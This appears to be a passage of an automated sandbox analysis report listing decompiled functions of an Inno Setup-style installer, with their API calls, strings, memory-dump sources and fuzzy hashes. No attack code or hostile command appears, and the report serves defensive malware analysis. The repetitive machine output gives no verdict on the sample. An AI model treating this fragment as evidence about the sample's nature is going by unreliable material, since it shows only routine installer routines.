                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                                    • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                                                    • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                                    • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006A52B8, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 006A531B
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006A5338
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006A535D
                                                                                      • Part of subcall function 005ABC0C: IsWindow.USER32(?), ref: 005ABC1A
                                                                                      • Part of subcall function 005ABC0C: EnableWindow.USER32(?,000000FF), ref: 005ABC29
                                                                                    • GetActiveWindow.USER32 ref: 006A543C
                                                                                    • SetActiveWindow.USER32(00000005,006A54A6,006A54BC,?,?,000000EC,?,000000F0,00000000,006A54D5,?,00000000,?,00000000), ref: 006A548F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                                    • String ID: `
                                                                                    • API String ID: 4222481217-2679148245
                                                                                    • Opcode ID: f82f3a88dc6d79e55ae111fc2833cd54c161982065b92a2fb1a1cf7feaba2b23
                                                                                    • Instruction ID: 0fd76088e2c4d2a0b73483b86e0718ee358c57a1ce37f9eef895c2ea124613ec
                                                                                    • Opcode Fuzzy Hash: f82f3a88dc6d79e55ae111fc2833cd54c161982065b92a2fb1a1cf7feaba2b23
                                                                                    • Instruction Fuzzy Hash: 3C613574A04608AFDB00EFA9C885A9EBBF6FB4A350F55406AF805E7361E7749D41CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B76A0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,006B77DD,?,006D479C,?,?,006B7992,00000000,006B79E6,?,00000000,00000000,00000000), ref: 006B76F1
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B7774
                                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,006B77B0,?,00000000,?,00000000,006B77DD,?,006D479C,?,?,006B7992,00000000,006B79E6), ref: 006B778C
                                                                                    • FindClose.KERNEL32(000000FF,006B77B7,006B77B0,?,00000000,?,00000000,006B77DD,?,006D479C,?,?,006B7992,00000000,006B79E6), ref: 006B77AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: 4b08649f8aafdd6527729fec544f003c51ffa25255d15a6d5757e19087413f67
                                                                                    • Instruction ID: 79e9ceeb2d56e6557c801ea3163462384df166d2aae906ae326ab386235d3f59
                                                                                    • Opcode Fuzzy Hash: 4b08649f8aafdd6527729fec544f003c51ffa25255d15a6d5757e19087413f67
                                                                                    • Instruction Fuzzy Hash: 6631A470A04618AFCB10DB65CC95ADDB7B9EBC8304F5145FAE804B3391EB389E808B58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C7E30, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 005C7E75
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005C7E92
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005C7EB7
                                                                                    • GetActiveWindow.USER32 ref: 005C7EC5
                                                                                    • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C7EF2
                                                                                    • SetActiveWindow.USER32(00000000,005C7F20,?,000000EC,?,000000F0,?,00000000,005C7F56,?,?,00000000), ref: 005C7F13
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1633107849-0
                                                                                    • Opcode ID: 1edcc46b462108747954335677705eb705acb89d190f873b86225193a443e0a7
                                                                                    • Instruction ID: 04038d4d1975b4c22e4e20a0d885d21cf8c5e77e15af7471f3fa6a64eef30c34
                                                                                    • Opcode Fuzzy Hash: 1edcc46b462108747954335677705eb705acb89d190f873b86225193a443e0a7
                                                                                    • Instruction Fuzzy Hash: F3316E75A08208AFDB00DFA9D885EA97BE9FB8E754F1144A9F504D77A1CB34AD00DB14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C78B8, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C78C5
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C78D5
                                                                                      • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B7A93,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B7DB9,?,?,00000000), ref: 00413EA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                                    • String ID:
                                                                                    • API String ID: 3525989157-0
                                                                                    • Opcode ID: 364cdd896dbb109610e95a44878ce712291c39d4ff18a58479a2635730072091
                                                                                    • Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
                                                                                    • Opcode Fuzzy Hash: 364cdd896dbb109610e95a44878ce712291c39d4ff18a58479a2635730072091
                                                                                    • Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B79F4, Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006B7DB9,?,?,00000000,?,00000000,00000000,?,006B829A,00000000,006B82A4,?,00000000), ref: 006B7A7B
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B7DB9,?,?,00000000,?,00000000,00000000), ref: 006B7AA1
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B7AC2
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B7DB9,?,?,00000000,?,00000000), ref: 006B7AD7
                                                                                      • Part of subcall function 005C5D2C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C5DC1,?,?,?,00000001,?,0060FCDE,00000000,0060FD49), ref: 005C5D61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                    • String ID: (Pm$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                    • API String ID: 66301061-2153116510
                                                                                    • Opcode ID: c4b11711b7d721b041a93ff0209a0813a348f350b4d9ea4624a833d8695f9adb
                                                                                    • Instruction ID: 8ff4ba97fe8783844e50e44af70b96f4c7a98e8a8f2e68f95f10e32dd77d20f9
                                                                                    • Opcode Fuzzy Hash: c4b11711b7d721b041a93ff0209a0813a348f350b4d9ea4624a833d8695f9adb
                                                                                    • Instruction Fuzzy Hash: 9E91B1B06082099FDB10EBA4D856FEEBBB6FF88304F514469F500A7691DB39AD81CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0062967C, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 214COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,0062993E,?,?,?,?,00000005,00000000,00000000,?,?,0062AD40,00000000,00000000,?,00000000), ref: 006297F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                    • API String ID: 1452528299-3112430753
                                                                                    • Opcode ID: f50419d46a65ea2f5349f159ad8605c730f602b1801fbb8f7d173c69b4e49347
                                                                                    • Instruction ID: 5f97cc3f942ec822775001ce78f35f044808c5a8b545990c5ebfc5930a6ec5c3
                                                                                    • Opcode Fuzzy Hash: f50419d46a65ea2f5349f159ad8605c730f602b1801fbb8f7d173c69b4e49347
                                                                                    • Instruction Fuzzy Hash: 7871B430B00A645BDB05EBA8E846BEE77A6AFC9310F14446DF801EB381DA749D45CB79
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060DE38, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 253registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C6790: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,0060E0DA,?,?,00000003,00000000,00000000,0060E11E), ref: 0060DF59
                                                                                      • Part of subcall function 005C72F8: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CAC2A,00000000,005CAC7B,?,005CAE5C), ref: 005C7317
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E018,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060DFDA
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E018,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E001
                                                                                    Strings
                                                                                    • RegOpenKeyEx, xrefs: 0060DED3
                                                                                    • , xrefs: 0060DECA
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060DE75
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060DEAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                    • API String ID: 2812809588-1577016196
                                                                                    • Opcode ID: 00f7a324f222a61d4de82144d96248058b2f0833e79662fc8257cc60ee071902
                                                                                    • Instruction ID: 5ffe65932f4f8e7796c8cf642ead8af5e42ac307f6e0ca7c7b751169975c555e
                                                                                    • Opcode Fuzzy Hash: 00f7a324f222a61d4de82144d96248058b2f0833e79662fc8257cc60ee071902
                                                                                    • Instruction Fuzzy Hash: 62919E70A44219AFDB04DFE5C886BEFBBBAEB48304F10486AF501F7381D77999458B64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00626EC8, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 162registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006270D1,?,00626BCC,?,00000000,00000000,00000000,?,?,0062733C,00000000), ref: 00626F75
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006270D1,?,00626BCC,?,00000000,00000000,00000000,?,?,0062733C,00000000), ref: 00626FDF
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,006270D1,?,00626BCC,?,00000000,00000000,00000000,?), ref: 00627046
                                                                                    Strings
                                                                                    • v4.0.30319, xrefs: 00626F67
                                                                                    • .NET Framework not found, xrefs: 00627092
                                                                                    • .NET Framework version %s not found, xrefs: 0062707E
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00626F95
                                                                                    • v1.1.4322, xrefs: 00627038
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00626F2B
                                                                                    • v2.0.50727, xrefs: 00626FD1
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00626FFC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                    • API String ID: 3535843008-446240816
                                                                                    • Opcode ID: 2e916b96cb162c9b49b67c5b8810f7890dc19850b28a0617b0e300b88c526d21
                                                                                    • Instruction ID: c0f20b2d71ec8f474bf61d9ec020991ed2f273380f667ab3d85d0ceb4907a677
                                                                                    • Opcode Fuzzy Hash: 2e916b96cb162c9b49b67c5b8810f7890dc19850b28a0617b0e300b88c526d21
                                                                                    • Instruction Fuzzy Hash: 86510970E08529AFCB05DBA8E861FFE7BB7DB85300F15006EF50197381D679AA098F60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00625B40, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 00625B77
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625B93
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625BA1
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00625BB2
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625BF9
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625C15
                                                                                    Strings
                                                                                    • Helper isn't responding; killing it., xrefs: 00625B83
                                                                                    • Helper process exited., xrefs: 00625BC1
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00625BDF
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 00625BEB
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 00625B69
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: ece1fa278fa7807221ac24f99a083f5280eb08c08bd95b6f1cd0ee76d2da807a
                                                                                    • Instruction ID: d0bfad0dce46509abd09e9749dfb7e1faf5b73955165e0b8576abc6345a57add
                                                                                    • Opcode Fuzzy Hash: ece1fa278fa7807221ac24f99a083f5280eb08c08bd95b6f1cd0ee76d2da807a
                                                                                    • Instruction Fuzzy Hash: C6218070604F519EC330EB78E885B8BBBD69F48314F44CD2DB59BC7681E674E8808B66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B5CC8, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 145fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0060CD14: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE01
                                                                                      • Part of subcall function 0060CD14: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE11
                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B5EB6), ref: 006B5D4B
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B5EB6), ref: 006B5D72
                                                                                    • SetWindowLongW.USER32 ref: 006B5DAC
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B5E7F,?,?,000000FC,006B53C4,00000000,?,00000000), ref: 006B5DE1
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B5E55
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B5E7F,?,?,000000FC,006B53C4,00000000), ref: 006B5E63
                                                                                      • Part of subcall function 0060D210: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D2F6
                                                                                    • DestroyWindow.USER32(?,006B5E86,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B5E7F,?,?,000000FC,006B53C4,00000000,?), ref: 006B5E79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
